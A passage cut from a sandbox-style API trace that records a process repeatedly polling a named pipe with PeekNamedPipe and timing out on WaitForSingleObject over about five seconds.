0x102 [0063.060] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0063.060] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0063.150] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0063.150] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0063.905] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0063.905] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0063.947] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0063.947] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0064.022] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0064.022] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0064.065] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0064.065] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0064.097] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0064.097] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0064.127] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0064.128] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0064.158] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0064.158] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0064.189] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0064.189] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0064.227] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0064.228] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0064.338] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0064.338] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0064.373] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0064.373] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0064.392] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0064.392] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0064.424] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0064.424] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0064.458] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0064.459] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0064.495] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0064.496] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0064.534] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0064.535] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0064.645] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0064.645] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0065.256] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0065.257] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0065.290] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0065.290] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0065.329] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0065.329] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0065.360] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0065.360] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0067.117] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0067.118] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0067.501] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0067.501] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0067.528] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0067.528] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0067.561] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0067.561] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0067.627] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0067.627] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0067.656] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0067.656] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0067.682] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0067.683] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0067.722] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0067.722] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0067.747] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0067.748] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0067.776] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0067.776] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0067.807] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0067.807] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0067.840] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0067.841] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0067.870] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0067.870] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0067.901] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0067.901] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0067.933] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0067.933] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0067.963] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0067.963] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0067.995] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0067.995] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0068.027] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0068.027] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0068.057] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0068.057] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0068.088] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0068.088] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0068.120] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0068.120] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0068.155] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0068.155] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0068.204] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0068.204] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0068.260] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0068.260] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0068.291] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0068.291] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0068.322] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0068.322] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0068.354] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0068.354] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0068.385] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0068.385] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0068.416] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0068.416] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0068.447] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0068.447] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0068.481] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0068.481] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0068.509] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0068.510] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0068.555] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0068.555] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0068.578] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0068.578] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0068.609] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0068.610] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0068.634] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0068.634] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0068.665] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0068.665] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0068.696] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0068.696] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0068.728] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0068.728] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0068.759] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0068.759] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0068.790] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0068.790] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0068.821] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0068.821] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0068.852] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0068.852] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0068.883] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0068.884] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0068.915] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0068.915] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0068.946] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 